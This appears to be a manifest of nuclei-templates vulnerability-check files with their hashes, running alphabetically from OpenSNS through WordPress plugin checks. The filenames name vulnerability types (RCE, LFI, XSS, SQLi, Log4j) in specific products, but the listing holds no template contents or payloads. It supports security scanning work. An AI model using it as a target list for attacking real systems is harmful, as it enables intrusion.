+nuclei-templates/vulnerabilities/other/opensns-rce.yaml:69c15501b397da2cd69f096539f8bd42efddd3fc +nuclei-templates/vulnerabilities/other/openvpn-hhi.yaml:aa12bb08bec7edb97fbc58ae0afad440f2f68b18 +nuclei-templates/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml:520e55bf365c9430d54ef79314e90e015509a461 +nuclei-templates/vulnerabilities/other/oracle-fatwire-lfi.yaml:1398eec761502a3749cc64cbc1dbe43b77db1982 +nuclei-templates/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml:879dff421063a4495a535dadb226ad0d91292204 +nuclei-templates/vulnerabilities/other/otobo-open-redirect.yaml:7c752ea4efefb666260c2e9e616dda276405445c +nuclei-templates/vulnerabilities/other/pacsone-server-lfi.yaml:88d846ff783be1bfe21076f7d738e9010fd24581 +nuclei-templates/vulnerabilities/other/parallels-hsphere-xss.yaml:522b8ba5edbb9d1e3de1d261ab6e05475f74f1b8 +nuclei-templates/vulnerabilities/other/parentlink-xss.yaml:2f17ab5ae98f66665bee869ae4bd99b2999f7377 +nuclei-templates/vulnerabilities/other/pbootcms-database-file-download.yaml:c555a9b372601b876a284df79bc0ebe76b51e4ff +nuclei-templates/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml:0d2be1eb677cf16842fd0c705feecf9005345f68 +nuclei-templates/vulnerabilities/other/php-timeclock-xss.yaml:dbef29b1cb0d0cef76cf2977707bfae5e5e54b1e +nuclei-templates/vulnerabilities/other/php-zerodium-backdoor-rce.yaml:554ad664530d8b0f2976919215b8c6cbb232151a +nuclei-templates/vulnerabilities/other/phpok-sqli.yaml:1effa91138ee15e16c181b8f5557670b4fa42a2d +nuclei-templates/vulnerabilities/other/phpwiki-lfi.yaml:6c54363f9a06256ed4e09997012662dd26735162 +nuclei-templates/vulnerabilities/other/pmb-directory-traversal.yaml:7fcb7885b782dfb6f52519a1013e439fe8fb706e +nuclei-templates/vulnerabilities/other/pmb-local-file-disclosure.yaml:840b77c62969bfad144193746707ae31d0a38312 +nuclei-templates/vulnerabilities/other/pollbot-redirect.yaml:84d0f43037b2193c003b10822e0d9fb397929223 +nuclei-templates/vulnerabilities/other/powercreator-cms-rce.yaml:3b5edb9d91e7196c29a5c43c57d9c3458c16bd9d +nuclei-templates/vulnerabilities/other/processmaker-lfi.yaml:b68cab3eb87f7864359c6a12b74cfe3e4dd3a1e6 +nuclei-templates/vulnerabilities/other/pyspider-unauthorized-access.yaml:c0f92bbd7af05e4ed73b99f542ea0848d8cb1c5d +nuclei-templates/vulnerabilities/other/qcubed-xss.yaml:9cb7a21d8b75ed34a55b38dd1a9caf2398cfac04 +nuclei-templates/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml:8235a97d460edfc6625f4724b4acf8052177a89e +nuclei-templates/vulnerabilities/other/qihang-media-disclosure.yaml:13380789dd86cb76f51e6d7f8cab81011da327bd +nuclei-templates/vulnerabilities/other/qihang-media-lfi.yaml:c1590bc900030afa13fdd4330811ec6016a024dd +nuclei-templates/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml:5fee887ceb8d308c55c8b804d3be3bce58f2e8e3 +nuclei-templates/vulnerabilities/other/rconfig-file-upload.yaml:ec24cf8ca10382e8fe82880ef99f35eed5b70071 +nuclei-templates/vulnerabilities/other/reddittop-rss-xss.yaml:176b097faba3118f68c5c8590e462e26e3854268 +nuclei-templates/vulnerabilities/other/resin-cnnvd-200705-315.yaml:4657d930f5a5ccbcbda96245fdb8b51d50e7e538 +nuclei-templates/vulnerabilities/other/resin-inputfile-fileread.yaml:4635dbb244bb1492dd99df18e08098fc3a1cd880 +nuclei-templates/vulnerabilities/other/resin-viewfile-lfr.yaml:59a28d625b4bd07744b8ac5a6fdac2b6ef4bf474 +nuclei-templates/vulnerabilities/other/rockmongo-xss.yaml:c5ee1c5943b728eef67c88f00256850b3f898e49 +nuclei-templates/vulnerabilities/other/rundeck-log4j.yaml:f1d926d99b4a9553d3011666df8af07f99bd96c3 +nuclei-templates/vulnerabilities/other/sap-redirect.yaml:be976c71cbac5eb714bb20445a960d595fcd12b6 +nuclei-templates/vulnerabilities/other/sar2html-rce.yaml:588e31d33ac01b50c25ab507fb763ec8c8311b84 +nuclei-templates/vulnerabilities/other/seacms-rce.yaml:b0a397668edb45cf1ea5d013b1af63356a339bb7 +nuclei-templates/vulnerabilities/other/seacms-sqli.yaml:38210c909d3411119f8c3a6ea252833097f33ba1 +nuclei-templates/vulnerabilities/other/seowon-router-rce.yaml:6ea92b4fd3356a2af1001d5a0e1ed9c4bc6bae50 +nuclei-templates/vulnerabilities/other/servicenow-helpdesk-credential.yaml:4272ab0452fa7b653a765fc5316431b9a0d6f378 +nuclei-templates/vulnerabilities/other/showdoc-file-upload-rce.yaml:baf36f7e26475c0a53ea4c255727a0303cea0de2 +nuclei-templates/vulnerabilities/other/sick-beard-xss.yaml:ea204963302a1dfb30fc12262a7daffcbc6fe53b +nuclei-templates/vulnerabilities/other/siteminder-dom-xss.yaml:73e4034dfff537f1a77e6c1e8df3d70eb5637211 +nuclei-templates/vulnerabilities/other/sl-studio-lfi.yaml:bc7b96801dd89309f82cd3a9cbd50c8610a4da7b +nuclei-templates/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml:9de935d2ff318a6a943ac62b798119a40b72b5bd +nuclei-templates/vulnerabilities/other/solar-log-authbypass.yaml:3f319c1ed4a1302e2850a6325e6518e9beb6690a +nuclei-templates/vulnerabilities/other/solarview-compact-xss.yaml:0e35c8c24784adcef899cf731f3cf1be1e96ffe0 +nuclei-templates/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml:0abe11e54192a05cade351a81be62a8b26545ab7 +nuclei-templates/vulnerabilities/other/spark-webui-unauth.yaml:1bf552d4b54ddb0664116f0fde2e4dfd5064d7ec +nuclei-templates/vulnerabilities/other/sponip-network-system-ping-rce.yaml:9d67d2fa09c73abfba6b7b3b4d660a65cd900080 +nuclei-templates/vulnerabilities/other/steve-xss.yaml:fc14f4628923901dd9d72ff07dc35686560eb026 +nuclei-templates/vulnerabilities/other/surrealtodo-lfi.yaml:132887fe27daaf03196d19d627fbbbed36a033f9 +nuclei-templates/vulnerabilities/other/symantec-messaging-gateway.yaml:cd69a58dda709f2625ba1f7cdbd8de4e8773dee2 +nuclei-templates/vulnerabilities/other/tamronos-rce.yaml:a7d7ffb62babdc4ce0b0d359f3208fbbbc38b21b +nuclei-templates/vulnerabilities/other/tekon-info-leak.yaml:0835189392c893b3b4202dfde59cf48423d4fab2 +nuclei-templates/vulnerabilities/other/thinkific-redirect.yaml:72fbee95482ae2510f07dd283dacb5c3689bac27 +nuclei-templates/vulnerabilities/other/thruk-xss.yaml:71947e9ebb34371cd60dc6412c8a9dbf088d0deb +nuclei-templates/vulnerabilities/other/tianqing-info-leak.yaml:66bc60904fa6cbb19ac13966963e35971221947f +nuclei-templates/vulnerabilities/other/tikiwiki-reflected-xss.yaml:7a1e11d40fcede867fd36205b9257c74ae8e183e +nuclei-templates/vulnerabilities/other/tpshop-directory-traversal.yaml:afb2a9e4ee36f8ddbe771be6c3094557c8d15e92 +nuclei-templates/vulnerabilities/other/turbocrm-xss.yaml:f2cb74f920952597feb3b8ba26d629e82f1a4893 +nuclei-templates/vulnerabilities/other/twig-php-ssti.yaml:39e4bf51034208e5ac45fb05269946958e561825 +nuclei-templates/vulnerabilities/other/ueditor-file-upload.yaml:49cf4efbf2e88353e49cb0436a14fcfcafdf417c +nuclei-templates/vulnerabilities/other/umbraco-base-ssrf.yaml:2ce947571f56e16d4e8e91cddd37951e0b607f53 +nuclei-templates/vulnerabilities/other/unauth-hoteldruid-panel.yaml:08e26f2d3ad9191bd5acbc148b63455e6954ed77 +nuclei-templates/vulnerabilities/other/unauth-spark-api.yaml:1cfe3926757976fc8199ea84b22440b984cf98cd +nuclei-templates/vulnerabilities/other/unifi-network-log4j-rce.yaml:3a38dfc75437f027d4f09856fc65f63c20736b6e +nuclei-templates/vulnerabilities/other/vanguard-post-xss.yaml:c31e0695a9bef857629b5296847faad9f3a81a45 +nuclei-templates/vulnerabilities/other/viewlinc-crlf-injection.yaml:9c2548c0e407d6da9a12cfb2bb24836c2aa6f16d +nuclei-templates/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml:1f33f26ab5165c27e9bc73c047c66e586cba1c65 +nuclei-templates/vulnerabilities/other/vpms-auth-bypass.yaml:481ec25242829f8e8b8e118776d3bb8e11fc8e76 +nuclei-templates/vulnerabilities/other/wapples-firewall-lfi.yaml:472154dcaf09b9bff1b2d3838c2330b51a89ee06 +nuclei-templates/vulnerabilities/other/watchguard-credentials-disclosure.yaml:86994e759a5b138d0ba71e9009628483a8f51fbd +nuclei-templates/vulnerabilities/other/webpagetest-ssrf.yaml:980d0878be5e44ad83b993a2d4a05f8ce13ae6f5 +nuclei-templates/vulnerabilities/other/webui-rce.yaml:e5b5800a6730165d9989ac2228da018ca3da02d1 +nuclei-templates/vulnerabilities/other/wems-manager-xss.yaml:72189026fb4920aafd9acdd9afb7e973c46302e0 +nuclei-templates/vulnerabilities/other/wuzhicms-sqli.yaml:6b65016150c946d0a801942e8b28add79e5f6763 +nuclei-templates/vulnerabilities/other/xdcms-sqli.yaml:fb560e641c32b648ee0dc947bd90be36252d142d +nuclei-templates/vulnerabilities/other/xenmobile-server-log4j.yaml:2acd08408f9aa063a8da6484cf35d307d6758fd1 +nuclei-templates/vulnerabilities/other/xerox-efi-lfi.yaml:5951b76e3bc3db86e42abecd20f55fed68cb5bd2 +nuclei-templates/vulnerabilities/other/yapi-rce.yaml:cbad57761ceb41125fb43b5d49ebfaa6bff82e46 +nuclei-templates/vulnerabilities/other/yarn-resourcemanager-rce.yaml:82b12fb90c0eccd8f881a1ec39918333a677680a +nuclei-templates/vulnerabilities/other/yeswiki-sql.yaml:c5ebddca0024dc367744403d2508d16768173806 +nuclei-templates/vulnerabilities/other/yeswiki-stored-xss.yaml:ee6fe6848d732701aa2fd52bdce93eab6d0e1cd7 +nuclei-templates/vulnerabilities/other/yeswiki-xss.yaml:551e6fe7ad82bc27195a099c11ae960727588354 +nuclei-templates/vulnerabilities/other/yishaadmin-lfi.yaml:95599d22c644096c866e7f814960b99753ec22eb +nuclei-templates/vulnerabilities/other/zcms-v3-sqli.yaml:b348dbbc36ed4c25d21b99a353fef3e2d583330e +nuclei-templates/vulnerabilities/other/zimbra-preauth-ssrf.yaml:154f404ebf1536a5af70f542d49738f6f6ea8982 +nuclei-templates/vulnerabilities/other/zms-auth-bypass.yaml:f06ac6c03c73a590218ab998284878e68ca5a5b5 +nuclei-templates/vulnerabilities/other/zms-sqli.yaml:8064f1219a70a2ef54f0e087bac342ad8ed1f245 +nuclei-templates/vulnerabilities/other/zzcms-xss.yaml:7ef69908569137c0ba1eddcc91f663a3e5466aab +nuclei-templates/vulnerabilities/rails/rails6-xss.yaml:9a35c734aaa8e6a723bbebdea796b102f28294a9 +nuclei-templates/vulnerabilities/ransomware/deadbolt-ransomware.yaml:62d1e1954bd2976aeefd5144d177d5e1e6562015 +nuclei-templates/vulnerabilities/rocketchat/unauth-message-read.yaml:0ab75e63acac009d1ec3e1a8a9ccb41282cfb59a +nuclei-templates/vulnerabilities/royalevent/royalevent-management-xss.yaml:1d8718d38fafa15751ed790ce5b51c8589f88324 +nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml:38cac5fc2a1ba12ae6ee5194e570f56338a69c63 +nuclei-templates/vulnerabilities/ruijie/ruijie-eg-rce.yaml:a8fbf5b005b549e26c6826d4021b4b7fcb3ed595 +nuclei-templates/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:7c6f49d13e5e0f869e3fea111478e2f8f4316cab +nuclei-templates/vulnerabilities/ruijie/ruijie-password-leak.yaml:98873a188ec94859bc84d1a0585f9d2acbec102d +nuclei-templates/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml:0949bb583786d79b4b926f2dae5bc695b1e138f5 +nuclei-templates/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml:356b8bdbcc56941b2f6d164f8d306ed300bc3a19 +nuclei-templates/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml:682ca95ecda7366e51904ddb6fc25c70a84f959d +nuclei-templates/vulnerabilities/sangfor/sangfor-ba-rce.yaml:224157b162df8596f1166474a1249f9ca4394ed3 +nuclei-templates/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml:346e013f1a4b587d390c65bc4be3f3360e5ffcf6 +nuclei-templates/vulnerabilities/sangfor/sangfor-edr-rce.yaml:69113fdd871451def6217b1eb278e7cc258f00d6 +nuclei-templates/vulnerabilities/seeyon/wooyun-2015-148227.yaml:05c4d2e2ba02cf424b9a913a964b30fbad6bfef2 +nuclei-templates/vulnerabilities/seeyon/zhiyuan-file-upload.yaml:ec38f646dff746e7094e05323cbfb514e498c124 +nuclei-templates/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml:87708357d6cb219bd079dd13121236193526bf38 +nuclei-templates/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml:351fc007e2e7a015265cc43d3483fce42d686648 +nuclei-templates/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml:463051171144cc189bcc631328f227f5946b9feb +nuclei-templates/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml:1b50d0bba92dc6c9edce98be0b15e115227899ed +nuclei-templates/vulnerabilities/springboot/springboot-h2-db-rce.yaml:9979ec93c503145b5218ece151c644b45a2e5592 +nuclei-templates/vulnerabilities/springboot/springboot-log4j-rce.yaml:60a76680a3864363ac49e4567da710a668269517 +nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml:93f228417c997f873bb9d745c54c2a119e602f98 +nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml:486bd7844abe69848f0b322ce7cb6b676b7dbd33 +nuclei-templates/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml:cd7470f66c0fe6110833f634a242fe1328075ae8 +nuclei-templates/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml:a715064823f41cb9ff4419a4c059cf348cdd5615 +nuclei-templates/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml:0e1964aae175d95efa727bc5b2a4cf7f925392c0 +nuclei-templates/vulnerabilities/thinkcmf/thinkcmf-rce.yaml:ed6b185ea514a2c203aa7da73944475d85bb719a +nuclei-templates/vulnerabilities/thinkphp/thinkphp-2-rce.yaml:ea456cf673ff548543a863b8f118840adc597ba1 +nuclei-templates/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:73286fe1794589e08fb0543f478ee8027dcb957b +nuclei-templates/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:c74ecae662c6f9cd48235ef2b4a8a8f61c7e1716 +nuclei-templates/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:eabdef9500d38d7296798a5a4c157a637f9f695c +nuclei-templates/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:fa426ea7dadecc3091d9463df7faf61a6391d30f +nuclei-templates/vulnerabilities/tongda/tongda-path-traversal.yaml:5ffe1721d7bc627a7f1c1b53b1a0fbb95b03fb36 +nuclei-templates/vulnerabilities/tongda/tongda-session-disclosure.yaml:1c4c998c93206da0bcd3dfa361b80d27b13ea455 +nuclei-templates/vulnerabilities/videoxpert-lfi.yaml:107585ad6c136a3a44338b5640b71abd6fbe81e3 +nuclei-templates/vulnerabilities/vmware/vmware-hcx-log4j.yaml:cd069b27a73cfa614f9c4096f9511980c8607c2c +nuclei-templates/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml:013535797ea3a05de88882123abc7fb551140822 +nuclei-templates/vulnerabilities/vmware/vmware-nsx-log4j.yaml:be664992c73cae5634955d09a69c5a0068f5943c +nuclei-templates/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml:c689a600bcf9a32cdd730abb1f6c31c03e1e43c6 +nuclei-templates/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml:f51637bd43592bf0bac94bbdcd6ae8bf893449f7 +nuclei-templates/vulnerabilities/vmware/vmware-vcenter-lfi.yaml:f3f9c98c78e47b7da36ecaa2d5b884aac52a9411 +nuclei-templates/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml:570c79268252f6b96b6d8dd54d75358e3e22842b +nuclei-templates/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml:e7e094702552fbbc33f76459f7f33f6f35641b1c +nuclei-templates/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml:e769222b53b39b6ac27c724c797fa29d9182b740 +nuclei-templates/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml:3423452b6ac3d0ef471bea63d0942e4a7203ef5f +nuclei-templates/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml:fc80145ec5b35318331c8dcc7945e54bea4b4f46 +nuclei-templates/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml:2072ed437d60097d967d9295008ff5df92943d2e +nuclei-templates/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml:a74d2c0f43f89846973ce746ecbfb88b0e8fa84e +nuclei-templates/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml:8fe645f3669f1a52d7a18b7a76b3110230786d86 +nuclei-templates/vulnerabilities/weaver/oa-v9-uploads-file.yaml:f8231f2041bb3aff99dbecefcd7da026336109cf +nuclei-templates/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml:bf8ead3bfffb8ff02e5bb67a6155ddb1c3732a10 +nuclei-templates/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml:33cd607de2f091f02e0179fc43b2ea01fa314d66 +nuclei-templates/vulnerabilities/wordpress/404-to-301-xss.yaml:54eb7667d83609e8338d29545cfccc104181580a +nuclei-templates/vulnerabilities/wordpress/ad-widget-lfi.yaml:3b7ada9d4bdd91bdf27c16589921014d1a9a5739 +nuclei-templates/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml:5627d6149df87b1988d6383c0a6cdbb0b2b624ba +nuclei-templates/vulnerabilities/wordpress/age-gate-open-redirect.yaml:dc10d0bda206c2ca79ba45f6a40d7efeaea14c30 +nuclei-templates/vulnerabilities/wordpress/age-gate-xss.yaml:4c382577a9398a9150f1b2c59ef68b55e8de51fd +nuclei-templates/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml:208341a45285eaa533095552ef1899c62b6e31c3 +nuclei-templates/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml:1283296b6366a83e33346cb5f005d9aefe965edb +nuclei-templates/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml:25033c603c35b57a9009a8984cc7be98bd017260 +nuclei-templates/vulnerabilities/wordpress/analytify-plugin-xss.yaml:5f97bde4717c534c724c8ba8a4d14a68e2245c6c +nuclei-templates/vulnerabilities/wordpress/aspose-file-download.yaml:4775b8ba43a49d6c5506127bb4dafbdc27affa4e +nuclei-templates/vulnerabilities/wordpress/aspose-ie-file-download.yaml:446a767865fc0d93555303cdeaf8a80c99da0f96 +nuclei-templates/vulnerabilities/wordpress/aspose-pdf-file-download.yaml:9970b2635680e47d1e30c8da3326a827a11d1452 +nuclei-templates/vulnerabilities/wordpress/aspose-words-file-download.yaml:ecacb4f44b00e73065f015c3de7216624c36324f +nuclei-templates/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml:1340aeb71d701b4b17d4f1c34ffbeb209fa21857 +nuclei-templates/vulnerabilities/wordpress/avchat-video-chat-xss.yaml:cd00276739af4de8815c48542ffe9e101c73895f +nuclei-templates/vulnerabilities/wordpress/brandfolder-lfi.yaml:14d5d813bb8af1691619ff259df90e2dced98401 +nuclei-templates/vulnerabilities/wordpress/brandfolder-open-redirect.yaml:db778cc18fe256187cb1ffe94e91c4eabae46c78 +nuclei-templates/vulnerabilities/wordpress/calameo-publications-xss.yaml:30b051a0fda67bcd09cc6d8b482136381ef0ed39 +nuclei-templates/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml:ec9563d537f472ca85705f5f0e1d492685e40162 +nuclei-templates/vulnerabilities/wordpress/cherry-file-download.yaml:423a059d45b724de698a734520e7f7bc94acc083 +nuclei-templates/vulnerabilities/wordpress/cherry-lfi.yaml:23ecda2e2d822b6068b587a728468ff959eba84c +nuclei-templates/vulnerabilities/wordpress/church-admin-lfi.yaml:ba1df796ee2695cae73b03e92ec5d38b6487f100 +nuclei-templates/vulnerabilities/wordpress/churchope-lfi.yaml:55d30067ac72b31bbda9a94e533707c79a41515b +nuclei-templates/vulnerabilities/wordpress/clearfy-cache-xss.yaml:dca4cee8b8dfaa162105317ad4314ee4daa1c00d +nuclei-templates/vulnerabilities/wordpress/curcy-xss.yaml:d3546608fe01dfc0da228a34fa584f38bbbe56e4 +nuclei-templates/vulnerabilities/wordpress/diarise-theme-lfi.yaml:f5349c2de17236f79f8f97461a5513a66a629f23 +nuclei-templates/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml:69f3134837fa8f8a6cf1ef94ea50a2babf972125 +nuclei-templates/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml:f31842e681f30cce17ce31811b385e0b6de73d89 +nuclei-templates/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml:02c69c599c474ddf876b722b6ee95ef8d2fefe9b +nuclei-templates/vulnerabilities/wordpress/elex-woocommerce-xss.yaml:934233cafeb2c041b7752b5f6fcc3943b7cac1b8 +nuclei-templates/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml:a4a7045037971b4260e24eb444b6e55fc31f2878 +nuclei-templates/vulnerabilities/wordpress/hb-audio-lfi.yaml:7f055ba0ce8222a80e5e0fc32e9607e79600f703 +nuclei-templates/vulnerabilities/wordpress/health-check-lfi.yaml:6239e7458e516200dfbaf8b96743342178228b5e +nuclei-templates/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml:3c23431b1aa31ad111751b3aa8d56046815b196f +nuclei-templates/vulnerabilities/wordpress/issuu-panel-lfi.yaml:813ffc07a17cd25bdd97a7c63b95cb9b81518212 +nuclei-templates/vulnerabilities/wordpress/members-list-xss.yaml:989f716f70c7142225a5ddf15e0d972a1ab2d8fd +nuclei-templates/vulnerabilities/wordpress/modula-image-gallery-xss.yaml:a0fcd0c1ae16ce09c1f95055a58b558d3f44b03e +nuclei-templates/vulnerabilities/wordpress/mthemeunus-lfi.yaml:630f5b840f150988bea69a8b85511e24ad41bbc7 +nuclei-templates/vulnerabilities/wordpress/music-store-open-redirect.yaml:f4b3149d0673671637d72c5a44059116d3a3fde4 +nuclei-templates/vulnerabilities/wordpress/my-chatbot-xss.yaml:2771a93831360105d7876d2b33997f3fcd97b30a +nuclei-templates/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml:244857f4ec0b08aeb35f09861beda1af81beebcc +nuclei-templates/vulnerabilities/wordpress/new-user-approve-xss.yaml:dcfa8a805e7f91f1c88ccafde862d0d166e0f8cd +nuclei-templates/vulnerabilities/wordpress/newsletter-open-redirect.yaml:3096d8990dc43d77572f6127f9115952caffde5e +nuclei-templates/vulnerabilities/wordpress/pieregister-open-redirect.yaml:66c129cffb4b0fb02990bc0eb86ae7ce03a161ad +nuclei-templates/vulnerabilities/wordpress/sassy-social-share.yaml:c8aa6fdaa2e55ac67030d71af76bdc638dc0aebf +nuclei-templates/vulnerabilities/wordpress/seo-redirection-xss.yaml:5ef9f0523ea530c1647a246171de94613f0c1496 +nuclei-templates/vulnerabilities/wordpress/shortcode-lfi.yaml:18aa25bc18b2d38b1d68f114954c09cef2444c27 +nuclei-templates/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml:09fed10a41c99a3b4e901e2e1707f088cb91f76e +nuclei-templates/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml:7b83aa989707c22aaa1f9dda91c7db58640ae279 +nuclei-templates/vulnerabilities/wordpress/unauthenticated-duplicator-disclosure.yaml:0e222f4715bb93d19d4e4552ad553355bd58117b +nuclei-templates/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml:f2995732a8af8712622eebb3288173fb464ed201 +nuclei-templates/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml:d81c1d543b7d03a50a885e71ffdda17782211d57 +nuclei-templates/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml:ce7642fbddd59e0f277becf71706a30c98d5f330 +nuclei-templates/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:c1ed13b682f970c960d36ce24f455f0e99ffde9c +nuclei-templates/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml:c5ef2bb95da7db24062db4358517a6448977f719 +nuclei-templates/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml:5a54187db7b77df736547634308e880089f5e671 +nuclei-templates/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml:927ca9011f23f7d9f6dc0a65d605d1106c785638 +nuclei-templates/vulnerabilities/wordpress/wordpress-db-backup.yaml:d10b2cd7f038372f155c5ee54e79d02bbdbca406 +nuclei-templates/vulnerabilities/wordpress/wordpress-db-repair.yaml:ede4e1bcf936bf34f1b3215b2d0bd05fee99cc21 +nuclei-templates/vulnerabilities/wordpress/wordpress-debug-log.yaml:4558e4bdc3a2207c09ee78ca7a26dbcc496744d0 +nuclei-templates/vulnerabilities/wordpress/wordpress-directory-listing.yaml:b08a70ba8c087b0bebc28b93bc8103f7144ce856 +nuclei-templates/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml:a90b2fe46512e93616e6524280262adc3d3d1104 +nuclei-templates/vulnerabilities/wordpress/wordpress-emergency-script.yaml:ecbd811a30cf79b93e143d43ffabb7faffe77209 +nuclei-templates/vulnerabilities/wordpress/wordpress-git-config.yaml:1aa804d4c47fd81d4501ead1d5e05a029cd27382 +nuclei-templates/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml:42b3198968407565a79bcd2d1c9c606be8344dba +nuclei-templates/vulnerabilities/wordpress/wordpress-installer-log.yaml:1049488cab85e2cca993c1ef0559bf621d9e0b90 +nuclei-templates/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml:7c2ab715a64e741b95d8674f02f32b5a4e105848 +nuclei-templates/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml:10d4a488a0055b34742d44741c696e6b254633c9 +nuclei-templates/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml:15f478df614d1f2ce171f0859c010ed59afe75a3 +nuclei-templates/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml:2827de57ad1897a74710e7fb70701f41fcb6f49c +nuclei-templates/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml:9567f7f1fe216a7c3cbbe17efccb5a92ef08b269 +nuclei-templates/vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml:d3a51386843c9eec4ddaa4916b5fb4b7a3408ca6 +nuclei-templates/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml:921277815da7f38014e8449ec8e4654fa4eae532 +nuclei-templates/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml:00b8fd22a6ae6fa9e02ba9b3a2ecb499f0cf30fc +nuclei-templates/vulnerabilities/wordpress/wordpress-user-enum.yaml:cf70349a9dc0bd97594b8a3f772c651292f9a26a +nuclei-templates/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml:f74a4ad9f015497be977791069fef851c60fdfff +nuclei-templates/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml:17fe8520f896187539144328afc171e87dc46309 +nuclei-templates/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml:0fdea778d4fde719b53b2072cb71d13ce668ba72 +nuclei-templates/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml:82993d75a727828fcba91a47e593a585d90563e0 +nuclei-templates/vulnerabilities/wordpress/wordpress-wp-cron.yaml:2d0549b7afb96251a166afc413b099c8f0b06c52 +nuclei-templates/vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml:80fe83de5bf1200db611adb91f8a1274de182e0e +nuclei-templates/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml:a7f3cc3106bb97f667c46330486e55c12ef3be51 +nuclei-templates/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml:a703e9b9e46c813a93817766a06b042a474817fe +nuclei-templates/vulnerabilities/wordpress/wp-adaptive-xss.yaml:be2f19f2aa68d19805dd23582786667356a34efb +nuclei-templates/vulnerabilities/wordpress/wp-all-export-xss.yaml:1ca799ac7df4ba96da41936d6135b34456dfafa9 +nuclei-templates/vulnerabilities/wordpress/wp-altair-listing.yaml:2dc9ed3fa37a5bd7f87d1fa27da94dabb027b504 +nuclei-templates/vulnerabilities/wordpress/wp-ambience-xss.yaml:254f72c0a68c764ed400b67b94da8374aa50b6f0 +nuclei-templates/vulnerabilities/wordpress/wp-arforms-listing.yaml:4d6f2fb2379755ca943bd9694b1c736691b12f7f +nuclei-templates/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml:3bee381f08b5c1f485e5dcbac53b8378d38d0fd4 +nuclei-templates/vulnerabilities/wordpress/wp-code-snippets-xss.yaml:a4261a6f94c3ffe850b06fe3245646ecfcea7840 +nuclei-templates/vulnerabilities/wordpress/wp-config-setup.yaml:3d117b1d67c3189b83caf9776aac5fffbc0a68e7 +nuclei-templates/vulnerabilities/wordpress/wp-custom-tables-xss.yaml:c16ad97f5e8ef1894de6ec62758d588d3d4e66cb +nuclei-templates/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml:c40cc1812be750b2461a4ad482d45fb36d41f885 